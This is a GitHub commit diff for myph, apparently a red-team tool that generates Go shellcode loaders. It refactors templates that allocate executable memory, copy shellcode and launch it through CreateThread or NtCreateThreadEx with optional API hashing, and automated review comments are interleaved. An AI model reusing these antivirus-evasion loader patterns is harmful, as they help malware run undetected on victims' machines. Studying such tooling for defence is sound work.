v1.2.3: minor fixes
djnnvx authored Jan 30, 2024
2 parents fb5a840 + d37fae2 commit 09dc0e6
Showing 9 changed files with 109 additions and 52 deletions.
2 changes: 2 additions & 0 deletions .goreleaser.yaml
Expand Up @@ -20,6 +20,8 @@ builds:
- linux
- windows
- darwin
goarch:
- amd64

archives:
- format: tar.gz
6 changes: 5 additions & 1 deletion Makefile
Expand Up @@ -2,7 +2,7 @@
# -------------------

APP_NAME = myph
APP_VERSION = 1.2.2
APP_VERSION = 1.2.3
GIT_REVISION = `git rev-parse HEAD`
DOCKER_IMAGE_TAG ?= $(APP_VERSION)
DOCKER_LOCAL_IMAGE = $(APP_NAME):$(DOCKER_IMAGE_TAG)
Expand Down Expand Up @@ -56,3 +56,7 @@ clean: ## clean up the project directory
.PHONY: docker
docker: ## build a local docker image
@docker build . -t $(APP_NAME):latest -t $(APP_NAME):$(APP_VERSION)

.PHONY: release-build
release-build: ## makes a release build locally on the current commit
@goreleaser release --skip=publish --snapshot
3 changes: 3 additions & 0 deletions README.md
Expand Up @@ -12,6 +12,9 @@ for general information and testing. The tool and this repository are carefully
However, the developers cannot be held liable for for any damage, direct or indirect, of whatever nature as a result of
or related to the access to or use of the software.

> IOCs have voluntarily been added to the project. Don't open any issues regarding detections, it's pointless.
> The goal of this project is to learn & teach. If you want a FUD loader, dont be a baby and make your own.
## How to use the software ?

> Please note this project is under development & subject to changes.
34 changes: 27 additions & 7 deletions cli/parser.go
Expand Up @@ -71,7 +71,7 @@ func BuildLoader(opts *Options) *exec.Cmd {

func GetParser(opts *Options) *cobra.Command {

version := "1.2.2"
version := "1.2.3"
var spoofMetadata = &cobra.Command{
Use: "spoof",
Version: version,
Expand Down Expand Up @@ -143,6 +143,32 @@ func GetParser(opts *Options) *cobra.Command {
os.Exit(1)
}

if opts.UseAPIHashing {
fmt.Printf("[+] Retrieving dependencies to use API Hashing...\n")

execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe")
execGoGetCmd.Dir = MYPH_TMP_DIR
_, _ = execGoGetCmd.Output()

if opts.WithDebug {
// if running debug, we want to have the local internals because
// it makes development easier

fmt.Printf("[+] Running \"cp -r ./internals /tmp/myph-out\"\n")

execGoGetCmd = exec.Command("cp", "-r", "./internals", MYPH_TMP_DIR)
execGoGetCmd.Dir = "."
_, _ = execGoGetCmd.Output()

} else {
// this should stay to cmepw addr
execGoGetCmd = exec.Command("go", "get", "github.com/cmepw/myph/internals")
execGoGetCmd.Dir = MYPH_TMP_DIR
_, _ = execGoGetCmd.Output()
}

}

/* reading the shellcode as a series of bytes */
shellcode, err := tools.ReadFile(opts.ShellcodePath)
if err != nil {
Expand Down Expand Up @@ -274,12 +300,6 @@ func GetParser(opts *Options) *cobra.Command {

fmt.Printf("\n[+] Template (%s) written to tmp directory. Compiling...\n", opts.Technique)

if opts.UseAPIHashing {
execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe")
execGoGetCmd.Dir = MYPH_TMP_DIR
_, _ = execGoGetCmd.Output()
}

execCmd := BuildLoader(opts)
execCmd.Dir = MYPH_TMP_DIR
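Review bot: All three exec.Command calls added in the new UseAPIHashing block (the `go get github.com/Binject/debug/pe`, the `cp -r ./internals`, and the `go get github.com/cmepw/myph/internals`) discard both output and error with `_, _ = execGoGetCmd.Output()`, so a failed fetch or copy (offline, module proxy error, missing ./internals) is silently ignored and only surfaces later as an unrelated compile failure in BuildLoader. Check each call and stop on error in the style the function already uses a few lines above, e.g. `if out, err := execGoGetCmd.CombinedOutput(); err != nil { fmt.Printf("[-] go get failed: %v\n%s", err, out); os.Exit(1) }`. The two `go get` invocations also carry no version suffix, so the module version pulled into the build presumably depends on whatever the proxy resolves as latest at build time; pinning a tag or commit keeps generated builds reproducible and limits exposure to an unexpected upstream change. Separately, the debug-mode message hardcodes `/tmp/myph-out` while the command itself uses `MYPH_TMP_DIR`; printing the variable keeps the message true if the constant changes. GetParser begins and ends outside this hunk.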

33 changes: 20 additions & 13 deletions loaders/createThread.go
Expand Up @@ -35,24 +35,15 @@ import (
}

func (t CreateTTemplate) Const() string {
return fmt.Sprintf(`
if !t.UseApiHashing {

return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
`)
}

func (t CreateTTemplate) Init() string {

if t.UseApiHashing {
return fmt.Sprintf("\n")
}

return fmt.Sprintf(`
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
Expand All @@ -63,7 +54,23 @@ var (
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
`)
`)

}

return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
`)
}

func (t CreateTTemplate) Init() string {
return fmt.Sprintf("\n")
}

func (t CreateTTemplate) Process() string {
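Review bot: In the restructured `Const()`, the six-line const block is emitted verbatim by both branches, and the non-hashing branch now also returns the `var ( kernel32 = ... )` block, so the method name no longer describes its output while `Init()` is reduced to `return fmt.Sprintf("\n")`. Emit the const block once, append the `var` block only when `!t.UseApiHashing`, and return the literals directly (`return "\n"`), since `fmt.Sprintf` with no arguments is flagged by staticcheck (S1039) and would also mangle any `%` that later lands in the template. The same pattern appears in `loaders/ntCreateThreadEx.go` and `loaders/syscall.go` in this commit. `Process()` on the last line continues outside the hunk.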
48 changes: 30 additions & 18 deletions loaders/ntCreateThreadEx.go
Expand Up @@ -29,6 +29,8 @@ import (

return fmt.Sprintf(`
import (
"fmt"
"log"
"syscall"
"unsafe"
)
Expand All @@ -38,30 +40,40 @@ import (
func (t NtCreateThreadExTemplate) Const() string {
// same consts with or without API Hashing

return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
`)
}

func (t NtCreateThreadExTemplate) Init() string {

if t.UseApiHashing {
return fmt.Sprintf("\n")
return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
`)
}

return fmt.Sprintf(`
ntdll := syscall.MustLoadDLL("ntdll.dll")
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
var (
NtAllocateVirtualMemory = ntdll.MustFindProd("NtAllocateVirtualMemory")
NtWriteVirtualMemory = ntdll.MustFindProd("NtWriteVirtualMemory")
NtProtectVirtualMemory = ntdll.MustFindProd("NtProtectVirtualMemory")
NtCreateThreadEx = ntdll.MustFindProd("NtCreateThreadEx")
ntdll = syscall.MustLoadDLL("ntdll.dll")
NtAllocateVirtualMemory = ntdll.MustFindProc("NtAllocateVirtualMemory")
NtWriteVirtualMemory = ntdll.MustFindProc("NtWriteVirtualMemory")
NtProtectVirtualMemory = ntdll.MustFindProc("NtProtectVirtualMemory")
NtCreateThreadEx = ntdll.MustFindProc("NtCreateThreadEx")
)
`)

}

func (t NtCreateThreadExTemplate) Init() string {
return fmt.Sprintf("\n")
}

func (t NtCreateThreadExTemplate) Process() string {
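Review bot: The first hunk adds `"fmt"` and `"log"` to the generated import block unconditionally, but the method emitting it (its signature is above the hunk) does not branch on `t.UseApiHashing` the way the new `Const()` does; if either configuration of the rest of the template does not reference both packages, the emitted program fails to compile with "imported and not used". Worth confirming that both `fmt` and `log` are used in every branch of `Process()` (which starts on the last line and continues outside the hunk), or gating the import on the same flag. The `MustFindProd` typo the old side carried is fixed here, which is good.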
33 changes: 21 additions & 12 deletions loaders/syscall.go
Expand Up @@ -36,34 +36,43 @@ import (
}

func (t SysTemplate) Const() string {
// same consts with or without API Hashing

return fmt.Sprintf(`
if t.UseApiHashing {
return fmt.Sprintf(`
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
`)
}

func (t SysTemplate) Init() string {

if t.UseApiHashing {
return fmt.Sprintf("\n")
}

return fmt.Sprintf(`
kernel32 := syscall.MustLoadDLL("kernel32.dll")
ntdll := syscall.MustLoadDLL("ntdll.dll")
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READ = 0x20
PAGE_READWRITE = 0x04
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
VirtualProtect = kernel32.MustFindProc("VirtualProtect")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
VirtualProtect := kernel32.MustFindProc("VirtualProtect")
RtlCopyMemory := ntdll.MustFindProc("RtlCopyMemory")
`)
}

func (t SysTemplate) Init() string {
return fmt.Sprintf("\n")
}

func (t SysTemplate) Process() string {
if t.UseApiHashing {
return fmt.Sprintf(`
2 changes: 1 addition & 1 deletion loaders/utils.go
Expand Up @@ -3,7 +3,7 @@ package loaders
func InformExpermimental() {
println("[!] The API hashing feature is still in an an experimental stage!!")
println("Only a few methods are supported for now:")
println("\t-Syscall\n\t-CreateThread\n\t-tNtCreateThreadEx\n")
println("\t-Syscall\n\t-CreateThread\n\t-NtCreateThreadEx\n")
}

func InformProcessUnused(process string) {
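Review bot: The context line just above the fixed one still reads `"[!] The API hashing feature is still in an an experimental stage!!"` with a duplicated "an"; while touching this function, change it to `"[!] The API hashing feature is still in an experimental stage!!"`. The function name `InformExpermimental` is also misspelled (`InformExperimental`); renaming it touches its callers, which are outside this hunk, so that is better done as a separate change.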
Binary file removed utils/utils
Binary file not shown.
